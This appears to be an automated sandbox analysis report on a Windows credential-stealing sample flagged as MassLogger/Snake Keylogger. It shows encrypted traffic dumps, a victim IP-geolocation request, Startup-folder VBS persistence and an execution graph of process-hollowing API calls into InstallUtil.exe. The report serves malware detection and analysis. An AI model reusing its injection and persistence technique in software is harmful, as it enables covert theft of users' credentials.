                                                                                                                                2024-12-03 14:20:45 UTC4096INData Raw: ef 6a a5 b4 80 ff 68 60 c0 fb 9a 2e e9 62 6d ef 39 1f 86 6c ce 60 34 e8 43 f9 06 40 de f2 51 a1 2d 29 8f a3 8c e5 f3 d7 11 db 59 70 d8 43 48 2a 9a b8 49 bb 5b e3 b1 43 1b c8 39 72 6f a4 95 59 6f 56 ca 00 81 8f f9 50 4b 84 5f bc ef 87 99 73 0d 06 43 62 3c 9f 9a 7d 1f 68 10 f8 6f 24 c7 c8 43 7c 14 12 2b ca 9d c0 9d 51 f5 b1 f5 f8 85 56 1a 25 00 bf 0c 32 33 2f 0e 01 cd a1 96 a6 6f c4 ed bc ff e0 ea ba 11 6a f4 86 8d ec a1 ab 2b d1 63 55 0c 0e 36 eb 24 d0 3a f0 53 d9 d8 4c 1d 53 29 a3 16 94 76 97 d6 c1 b2 fe 1b 50 77 13 2a 20 23 94 ce e1 3b 38 33 39 4c 24 f7 2e 0d 6f 76 4c d6 45 78 1c 65 d1 39 ed 6d 9b 42 34 f6 4b 5f bd 47 38 0b 9d ab cb 17 12 f3 1d c1 98 7e 02 95 c0 ea a6 c6 8a a9 b2 7a 0f ae 17 ca 1a a7 e1 65 1b af d6 ae e4 6a 40 e7 50 1c c0 92 b8 e3 3c 7d
                                                                                                                                Data Ascii: jh`.bm9l`4C@Q-)YpCH*I[C9roYoVPK_sCb<}ho$C|+QV%23/oj+cU6$:SLS)vPw* #;839L$.ovLExe9mB4K_G8~zej@P<}
                                                                                                                                2024-12-03 14:20:45 UTC4096INData Raw: 34 a9 6d 44 09 04 27 cf 05 d7 9c d4 9a 6f bd 2f ab 17 bf 12 53 07 89 d9 52 8c 89 33 ea 3c 1f 5f 4c 6e 5c 3b 99 26 8a bc 5e 8a ba 4e ad 75 89 38 19 61 39 fa ed 47 55 98 4d 1b 41 79 a0 de 41 2d 39 c6 6c 29 42 dc c8 d9 99 70 11 05 65 44 3f 22 b7 03 3a b5 fe e3 f0 5e 6b 3e 32 4d 23 a1 f0 e5 61 07 fa a2 34 0f 45 27 f2 c9 b3 6d fd dc 84 00 0a d8 ee 33 c8 2a 94 15 4a ef 60 11 4c 31 7b 99 e9 b0 e4 c3 1c d6 06 01 2d e4 0f a7 a0 fa 1d 4b 2d e5 0c f2 0d 72 14 91 03 40 a9 35 0c 06 ed d7 82 11 df 81 35 4b 32 01 6f aa bd 65 73 20 95 39 92 2d 60 f8 5b 0f cb 9d 9a 92 69 c5 70 4d 48 62 42 6d 51 69 7b 08 30 d6 40 9b 87 f5 64 cf 3a be a1 8f dc 78 5f 20 42 1b ad d2 39 74 1a 57 8d f5 60 bc 74 8e 0c 98 5d b1 76 f8 24 05 1e d1 15 83 18 37 ed d4 a1 67 ce 37 e7 14 a4 15 5c 64 df
                                                                                                                                Data Ascii: 4mD'o/SR3<_Ln\;&^Nu8a9GUMAyA-9l)BpeD?":^k>2M#a4E'm3*J`L1{-K-r@55K2oes 9-`[ipMHbBmQi{0@d:x_ B9tW`t]v$7g7\d
                                                                                                                                2024-12-03 14:20:45 UTC4096INData Raw: 68 a7 e9 f0 93 c5 0f b8 ae 03 b4 99 83 8a c2 3a b4 54 fb 0c cf a6 9f d2 e8 5c c6 ec e2 19 84 aa 99 d0 95 b0 83 52 9d 61 99 37 8e 47 17 50 53 a7 e2 66 42 56 60 2c a0 fd 0b 1b 0f 52 4a 95 09 26 fa 64 61 d0 f8 aa 31 e8 d5 81 03 e3 1a 3d 4d 21 aa 56 c0 46 70 33 fc 62 62 ec 04 eb 7e 64 c9 76 51 09 ec 9d 1d 16 ac 29 19 65 2d 5c 0c 38 a0 2e 85 f8 a7 cd 7a 6b 2a c5 c5 d3 7c b1 d6 a5 e4 a4 c4 4c 01 61 8c dd 84 26 80 65 9b 5e f8 5f bf 27 05 70 83 75 52 18 0f 0b 91 95 35 89 0c 2b 69 24 4a 35 b8 e8 93 7b b6 f8 4c 16 9a 52 3c 81 d4 d2 e8 75 55 d1 dd db 61 d4 d3 8d 17 17 7d 04 07 3d af b6 da 13 93 93 c5 27 3a 97 f9 c0 0d bf 06 8c d4 16 17 6d fa ab ba 46 90 f9 17 ec b1 80 f8 01 1e a9 85 f5 e1 cb 0c b5 f3 22 bc 8d b6 74 fe 0a 9c 09 ec 7e 13 cf 6d 9f f9 4e f0 63 83 7b 93
                                                                                                                                Data Ascii: h:T\Ra7GPSfBV`,RJ&da1=M!VFp3bb~dvQ)e-\8.zk*|La&e^_'puR5+i$J5{LR<uUa}=':mF"t~mNc{
                                                                                                                                2024-12-03 14:20:45 UTC676INData Raw: 9c 37 01 e0 dd d2 ae 71 c5 a1 2e 8c 0c de 41 87 5d 37 ae 35 b3 d7 b6 73 47 5d f3 80 3d ea e7 00 39 8c cb 94 72 e4 c2 3a 07 d0 f6 c6 32 54 0d 93 f0 de 7c f5 a6 55 9a 33 22 3a 5f d3 90 86 44 b1 75 c4 68 b0 5a 9d 04 33 9d f8 f1 f3 6a 02 9c d9 f6 7a 51 21 c5 4f 80 09 c4 76 b0 01 dc a2 31 cf 53 1f ef 7a 1b ff d1 cd b3 d0 da 1a 04 7a 1f 61 fe 87 46 c9 39 15 10 9a e8 94 dc 44 c0 dc dd ae 15 64 cd ba f2 39 2c 2c 6b fe 58 b3 68 d5 55 eb d3 2d 04 97 fe cb 16 ce 73 d0 bb 1e 25 f0 ae 2b 46 a6 91 f5 7e 41 40 af 3f 39 8c 3f ca 03 c6 c4 08 2e c9 65 cf 80 ca 13 ed 90 dc 9b c8 26 c5 5b 50 c1 9c de d6 48 02 d6 c9 2f 9c 4d bf bc 82 1c d5 f3 50 f4 a4 14 7b 80 5f 3a a0 3e 25 05 b0 a0 fe 6a 43 92 5d 20 d6 5d 25 af 08 12 c1 94 8e bf 86 3a 17 8e 13 af 73 d1 85 5f 2c 9d 4e 6a 54
                                                                                                                                Data Ascii: 7q.A]75sG]=9r:2T|U3":_DuhZ3jzQ!Ov1SzzaF9Dd9,,kXhU-s%+F~A@?9?.e&[PH/MP{_:>%jC] ]%:s_,NjT
                                                                                                                                2024-12-03 14:20:45 UTC4096INData Raw: 89 1a 90 56 79 32 04 45 e5 79 a3 e9 22 03 a0 e0 09 3b bf e2 59 5d 37 68 8e ad 2b 35 bd c9 cd 96 6c c8 b3 06 07 b2 b9 e2 05 32 7c 41 03 6d c3 55 77 82 7a 16 3c 1a fd 8e e8 13 30 e8 dc b0 09 83 02 78 89 20 b3 c7 68 ce 6a 28 30 d9 fd c1 3b b5 f2 42 f8 1e db ea 5a 88 7a c6 ec 7b 63 8d d1 86 0d f2 12 20 d3 87 9a 9a ed cb 50 88 bb 31 b6 b3 fd 09 33 6a 0f 69 88 2d 27 51 5f 69 88 41 7b 71 57 89 5e 50 90 ec 71 e6 2f b7 fb 92 b3 8e 5f e7 10 f6 4e 6c f1 17 93 d5 3c f0 41 d9 2f db 42 44 6b 17 83 da a3 4b c4 ba bb e5 9e bd b0 07 fa 31 66 8b 00 00 34 12 ee 9c 11 89 dc de 9b 09 33 6d 82 80 da 2e 1c 9c 60 0a 87 9b 56 80 f5 a1 86 ae 32 69 e4 78 32 35 5f ff ea 7c 19 23 35 82 90 9a fa 23 e4 d3 66 e1 44 c3 f2 da bf 03 72 d2 7f 18 2e 1a 20 9b 63 ad c9 7d a1 e0 af cf 6d 8d bb
                                                                                                                                Data Ascii: Vy2Ey";Y]7h+5l2|AmUwz<0x hj(0;BZz{c P13ji-'Q_iA{qW^Pq/_Nl<A/BDkK1f43m.`V2ix25_|#5#fDr. c}m


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.549780172.67.177.1344434956C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-03 14:21:01 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-03 14:21:01 UTC884INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:21:01 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 113084
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TeV9lOz5V3KDHDwR0l7kV16RFJNOen%2FROVel92%2BRRmpAuqHdmRKfIyFFDp%2Brcju%2FeJ3m8mXudgVCpJ3zDHmjN36GJ2q8OT%2FACbCRqq%2BDmdBlDLE8D1wdAUgKIfPa%2B4zsFxNfpK2l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ec43364a9f84255-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1631&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1751649&cwnd=225&unsent_bytes=0&cid=3750a4926382400d&ts=467&x=0"
                                                                                                                                2024-12-03 14:21:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:09:20:11
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Ref#116670.exe"
                                                                                                                                Imagebase:0xe0000
                                                                                                                                File size:347'104 bytes
                                                                                                                                MD5 hash:9D61B7E79D1B236CEA4327B484A3D53F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2270876798.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:09:20:32
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                Imagebase:0xa00000
                                                                                                                                File size:42'064 bytes
                                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3287082945.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3283657783.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:4
                                                                                                                                Start time:09:20:40
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                                                                                                                                Imagebase:0x7ff60ab80000
                                                                                                                                File size:170'496 bytes
                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:09:20:40
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\vdvfyt.exe"
                                                                                                                                Imagebase:0x5d0000
                                                                                                                                File size:347'104 bytes
                                                                                                                                MD5 hash:9D61B7E79D1B236CEA4327B484A3D53F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2508374788.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 18%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:09:20:57
                                                                                                                                Start date:03/12/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                Imagebase:0x5a0000
                                                                                                                                File size:42'064 bytes
                                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3286734948.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.5%
                                                                                                                                  Dynamic/Decrypted Code Coverage:98.3%
                                                                                                                                  Signature Coverage:14.6%
                                                                                                                                  Total number of Nodes:287
                                                                                                                                  Total number of Limit Nodes:19
                                                                                                                                  execution_graph 66809 6a100a0 66810 6a1008a 66809->66810 66815 6a0cd60 66810->66815 66821 6a0cd53 66810->66821 66827 6a0de38 66810->66827 66835 6a0de28 66810->66835 66816 6a0cd75 66815->66816 66843 6a0cd90 66816->66843 66848 6a0cfc2 66816->66848 66853 6a0cda0 66816->66853 66817 6a0cd8b 66817->66810 66822 6a0cd60 66821->66822 66824 6a0cda0 2 API calls 66822->66824 66825 6a0cd90 2 API calls 66822->66825 66826 6a0cfc2 2 API calls 66822->66826 66823 6a0cd8b 66823->66810 66824->66823 66825->66823 66826->66823 66828 6a0de4d 66827->66828 66866 6a0df2f 66828->66866 66871 6a0de68 66828->66871 66876 6a0de78 66828->66876 66881 6a0e38f 66828->66881 66886 6a0df08 66828->66886 66829 6a0de63 66829->66810 66836 6a0de38 66835->66836 66838 6a0de68 2 API calls 66836->66838 66839 6a0de78 2 API calls 66836->66839 66840 6a0df08 2 API calls 66836->66840 66841 6a0df2f 2 API calls 66836->66841 66842 6a0e38f 2 API calls 66836->66842 66837 6a0de63 66837->66810 66838->66837 66839->66837 66840->66837 66841->66837 66842->66837 66844 6a0cdca 66843->66844 66845 6a0ce2b 66844->66845 66858 6a0daf8 66844->66858 66862 6a0daf0 66844->66862 66845->66817 66850 6a0cfc8 66848->66850 66849 6a0ce2b 66849->66817 66850->66849 66851 6a0daf0 VirtualProtect 66850->66851 66852 6a0daf8 VirtualProtect 66850->66852 66851->66850 66852->66850 66855 6a0cdca 66853->66855 66854 6a0ce2b 66854->66817 66855->66854 66856 6a0daf0 VirtualProtect 66855->66856 66857 6a0daf8 VirtualProtect 66855->66857 66856->66855 66857->66855 66859 6a0db40 VirtualProtect 66858->66859 66861 6a0db7b 66859->66861 66861->66844 66863 6a0daf8 VirtualProtect 66862->66863 66865 6a0db7b 66863->66865 66865->66844 66868 6a0def2 66866->66868 66867 6a0df01 66867->66829 66868->66867 66869 6a0daf0 VirtualProtect 66868->66869 66870 6a0daf8 VirtualProtect 66868->66870 66869->66868 66870->66868 66873 6a0dea5 66871->66873 66872 6a0df01 66872->66829 66873->66872 66874 6a0daf0 VirtualProtect 66873->66874 66875 6a0daf8 VirtualProtect 66873->66875 66874->66873 66875->66873 66878 6a0dea5 66876->66878 66877 6a0df01 66877->66829 66878->66877 66879 6a0daf0 VirtualProtect 66878->66879 66880 6a0daf8 VirtualProtect 66878->66880 66879->66878 66880->66878 66883 6a0def2 66881->66883 66882 6a0df01 66882->66829 66883->66882 66884 6a0daf0 VirtualProtect 66883->66884 66885 6a0daf8 VirtualProtect 66883->66885 66884->66883 66885->66883 66888 6a0def2 66886->66888 66887 6a0df01 66887->66829 66888->66887 66889 6a0daf0 VirtualProtect 66888->66889 66890 6a0daf8 VirtualProtect 66888->66890 66889->66888 66890->66888 66891 6816100 66892 681611a 66891->66892 66893 681612a 66892->66893 66895 6ac181e 66892->66895 66898 6acce88 66895->66898 66900 6acceaf 66898->66900 66902 6acd2d8 66900->66902 66903 6acd320 VirtualProtect 66902->66903 66905 6ac1833 66903->66905 66935 5cb02e8 66936 5cb0336 NtProtectVirtualMemory 66935->66936 66938 5cb0380 66936->66938 66906 245db40 66907 245db86 GetCurrentProcess 66906->66907 66909 245dbd1 66907->66909 66910 245dbd8 GetCurrentThread 66907->66910 66909->66910 66911 245dc15 GetCurrentProcess 66910->66911 66912 245dc0e 66910->66912 66913 245dc4b GetCurrentThreadId 66911->66913 66912->66911 66915 245dca4 66913->66915 66916 92d118 66917 92d130 66916->66917 66918 92d18b 66917->66918 66920 6acd8e0 66917->66920 66921 6acd908 66920->66921 66924 6acdd70 66921->66924 66922 6acd92f 66925 6acdd9d 66924->66925 66926 6acce88 VirtualProtect 66925->66926 66928 6acdf33 66925->66928 66927 6acdf24 66926->66927 66927->66922 66928->66922 67009 6a102cb 67010 6a102d5 67009->67010 67014 5cd7e00 67010->67014 67020 5cd7df0 67010->67020 67011 6a10331 67015 5cd7e15 67014->67015 67026 5cd7f6b 67015->67026 67030 5cd7e40 67015->67030 67034 5cd7e32 67015->67034 67016 5cd7e2b 67016->67011 67021 5cd7e00 67020->67021 67023 5cd7f6b 10 API calls 67021->67023 67024 5cd7e40 10 API calls 67021->67024 67025 5cd7e32 10 API calls 67021->67025 67022 5cd7e2b 67022->67011 67023->67022 67024->67022 67025->67022 67028 5cd7e9d 67026->67028 67027 5cd7eac 67027->67016 67028->67027 67038 5cd93e9 67028->67038 67032 5cd7e6a 67030->67032 67031 5cd7eac 67031->67016 67032->67031 67033 5cd93e9 10 API calls 67032->67033 67033->67032 67036 5cd7e40 67034->67036 67035 5cd7eac 67035->67016 67036->67035 67037 5cd93e9 10 API calls 67036->67037 67037->67036 67039 5cd940d 67038->67039 67051 5cd968d 67039->67051 67054 5cd94d2 67039->67054 67057 5cd98a1 67039->67057 67060 5cd9563 67039->67060 67063 5cd9764 67039->67063 67066 5cd9517 67039->67066 67069 5cd9448 67039->67069 67072 5cd9438 67039->67072 67075 5cd963d 67039->67075 67078 5cd9659 67039->67078 67052 5cd94b3 67051->67052 67081 5cd9cd0 67052->67081 67055 5cd94b3 67054->67055 67056 5cd9cd0 10 API calls 67055->67056 67056->67055 67058 5cd94b3 67057->67058 67059 5cd9cd0 10 API calls 67058->67059 67059->67058 67061 5cd94b3 67060->67061 67062 5cd9cd0 10 API calls 67061->67062 67062->67061 67064 5cd94b3 67063->67064 67065 5cd9cd0 10 API calls 67064->67065 67065->67064 67067 5cd94b3 67066->67067 67068 5cd9cd0 10 API calls 67067->67068 67068->67067 67070 5cd9475 67069->67070 67071 5cd9cd0 10 API calls 67070->67071 67071->67070 67073 5cd9448 67072->67073 67074 5cd9cd0 10 API calls 67073->67074 67074->67073 67076 5cd94b3 67075->67076 67077 5cd9cd0 10 API calls 67076->67077 67077->67076 67079 5cd94b3 67078->67079 67080 5cd9cd0 10 API calls 67079->67080 67080->67079 67082 5cd9cf5 67081->67082 67086 5cd9d17 67082->67086 67094 5cda354 67082->67094 67099 5cd9f35 67082->67099 67104 5cdaddc 67082->67104 67110 5cda288 67082->67110 67115 5cda47d 67082->67115 67120 5cda787 67082->67120 67125 5cdac02 67082->67125 67130 5cda207 67082->67130 67135 5cda097 67082->67135 67140 5cda9b5 67082->67140 67086->67052 67095 5cda363 67094->67095 67145 5cb21b8 67095->67145 67149 5cb21b1 67095->67149 67096 5cda407 67096->67086 67100 5cd9f44 67099->67100 67102 5cb21b8 WriteProcessMemory 67100->67102 67103 5cb21b1 WriteProcessMemory 67100->67103 67101 5cd9fdd 67101->67086 67102->67101 67103->67101 67105 5cdade6 67104->67105 67106 5cdaf54 67104->67106 67105->67086 67153 5cb1f12 67106->67153 67157 5cb1f18 67106->67157 67107 5cdaffa 67111 5cda292 67110->67111 67113 5cb1f18 VirtualAllocEx 67111->67113 67114 5cb1f12 VirtualAllocEx 67111->67114 67112 5cdaffa 67113->67112 67114->67112 67116 5cda22d 67115->67116 67117 5cda48a 67115->67117 67116->67115 67161 5cb2820 67116->67161 67165 5cb2828 67116->67165 67121 5cda796 67120->67121 67169 5cb1918 67121->67169 67173 5cb1910 67121->67173 67122 5cd9ee6 67126 5cdac11 67125->67126 67128 5cb1918 Wow64SetThreadContext 67126->67128 67129 5cb1910 Wow64SetThreadContext 67126->67129 67127 5cdac3d 67128->67127 67129->67127 67131 5cda211 67130->67131 67132 5cda48a 67131->67132 67133 5cb2828 NtResumeThread 67131->67133 67134 5cb2820 NtResumeThread 67131->67134 67133->67131 67134->67131 67136 5cdaf7a 67135->67136 67138 5cb1f18 VirtualAllocEx 67136->67138 67139 5cb1f12 VirtualAllocEx 67136->67139 67137 5cdaffa 67138->67137 67139->67137 67141 5cda9cd 67140->67141 67177 5cdb500 67141->67177 67183 5cdb510 67141->67183 67142 5cda9e5 67146 5cb2200 WriteProcessMemory 67145->67146 67148 5cb2257 67146->67148 67148->67096 67150 5cb2200 WriteProcessMemory 67149->67150 67152 5cb2257 67150->67152 67152->67096 67154 5cb1f58 VirtualAllocEx 67153->67154 67156 5cb1f95 67154->67156 67156->67107 67158 5cb1f58 VirtualAllocEx 67157->67158 67160 5cb1f95 67158->67160 67160->67107 67162 5cb2870 NtResumeThread 67161->67162 67164 5cb28a5 67162->67164 67164->67116 67166 5cb2870 NtResumeThread 67165->67166 67168 5cb28a5 67166->67168 67168->67116 67170 5cb195d Wow64SetThreadContext 67169->67170 67172 5cb19a5 67170->67172 67172->67122 67174 5cb195d Wow64SetThreadContext 67173->67174 67176 5cb19a5 67174->67176 67176->67122 67178 5cdb510 67177->67178 67179 5cdb549 67178->67179 67189 5cdbb71 67178->67189 67194 5cdb6c3 67178->67194 67199 5cdb647 67178->67199 67179->67142 67184 5cdb527 67183->67184 67185 5cdb549 67184->67185 67186 5cdb647 2 API calls 67184->67186 67187 5cdbb71 2 API calls 67184->67187 67188 5cdb6c3 2 API calls 67184->67188 67185->67142 67186->67185 67187->67185 67188->67185 67191 5cdbb78 67189->67191 67191->67179 67204 5cb1144 67191->67204 67208 5cb1150 67191->67208 67195 5cdb6eb 67194->67195 67197 5cb1150 CreateProcessA 67195->67197 67198 5cb1144 CreateProcessA 67195->67198 67196 5cdbc19 67197->67196 67198->67196 67200 5cdb656 67199->67200 67202 5cb1150 CreateProcessA 67200->67202 67203 5cb1144 CreateProcessA 67200->67203 67201 5cdbc19 67202->67201 67203->67201 67205 5cb11b4 CreateProcessA 67204->67205 67207 5cb133c 67205->67207 67209 5cb11b4 CreateProcessA 67208->67209 67211 5cb133c 67209->67211 67212 6ace2c0 67213 6ace300 VirtualAlloc 67212->67213 67215 6ace33a 67213->67215 66995 245dd88 DuplicateHandle 66996 245de1e 66995->66996 66939 6a10111 66940 6a1008a 66939->66940 66941 6a0cd60 2 API calls 66940->66941 66942 6a0cd53 2 API calls 66940->66942 66943 6a0de28 2 API calls 66940->66943 66944 6a0de38 2 API 